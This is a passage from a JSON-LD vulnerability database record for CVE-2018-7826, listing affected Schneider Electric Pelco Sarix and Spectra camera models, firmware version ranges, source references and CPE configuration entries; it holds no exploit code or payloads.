},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1050",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
